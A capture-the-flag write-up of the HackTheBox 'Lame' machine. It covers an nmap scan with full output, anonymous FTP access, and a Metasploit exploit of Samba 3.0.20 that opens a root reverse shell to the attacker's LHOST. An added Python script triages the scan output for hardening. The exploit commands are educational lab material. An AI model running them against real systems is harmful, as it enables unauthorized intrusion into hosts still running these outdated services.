HackTheBox – Lame Write-up
This is a walkthrough of the Lame machine from HackTheBox.
Folder Setup and Nmap Scan
mkdir lame && cd lame
mkdir nmap && sudo nmap -sC -sV -oA nmap/lame 10.10.10.3
Results of the Nmap Scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-20 05:51 EDT
Nmap scan report for 10-10-10-3.tpgi.com.au (10.10.10.3)
Host is up (0.037s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.26
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_ 2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2023-05-20T05:51:47-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h59m29s, deviation: 2h49m45s, median: -32s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Nmap done: 1 IP address (1 host up) scanned in 57.17 seconds
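For anyone hardening a host that produces a scan like this, the findings worth acting on can be pulled out of the saved output automatically. The following is an added example, not part of the original write-up: the triage function, its watchlist, and the remediation wording are assumptions, and the sample input is a constructed excerpt of the scan above.

```python
import re

# Constructed sample: a few lines excerpted from the scan output above.
SAMPLE = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

# Assumed watchlist: the two versions this write-up looks up in searchsploit.
WATCHLIST = ("vsftpd 2.3.4", "Samba smbd 3.0.20")
# NSE script output that signals a weak setting, paired with the fix.
SCRIPT_RULES = [
    (re.compile(r"ftp-anon: Anonymous FTP login allowed"), "disable anonymous FTP login"),
    (re.compile(r"message_signing: disabled"), "require SMB message signing"),
]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

def triage(nmap_text):
    """Return (port, finding) tuples from Nmap normal (.nmap) output."""
    findings = []
    port = None  # port that owns the current script lines; None = host-level
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port = int(m.group(1))
            for known in WATCHLIST:
                if known in m.group(4):
                    findings.append((port, f"upgrade: {known} is on the watchlist"))
            continue
        if not line.startswith("|"):
            port = None  # any non-script line ends the per-port script block
            continue
        for pattern, advice in SCRIPT_RULES:
            if pattern.search(line):
                findings.append((port, advice))
    return findings

if __name__ == "__main__":
    for port, finding in triage(SAMPLE):
        print(port if port else "host", finding)
```

To run it against a real scan, pass the contents of the nmap/lame.nmap file written by the -oA option to triage().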
Anonymous FTP Access
Anonymous FTP is enabled. Use anonymous as the username when prompted. Simply press ‘Enter’ when prompted for the password without typing anything.
ftp 10.10.10.3
Found nothing interesting. Type ‘exit’ to quit the FTP session.
Exploiting vsftpd
The vsftpd version is vulnerable, as shown by a searchsploit search.
However, attempting the Metasploit exploit for this vsftpd version failed. Moving on to Samba.
Exploiting Samba
Performing a searchsploit search for the Samba version running on the machine:
searchsploit samba 3.0.20
Returns 1 exploit.
Using Metasploit to Exploit Samba
Using the exploit and adjusting the necessary settings:
use 0
set RHOST 10.10.10.3
set LHOST <your_ip>
run
Root shell opened. Type shell to make it an interactive shell.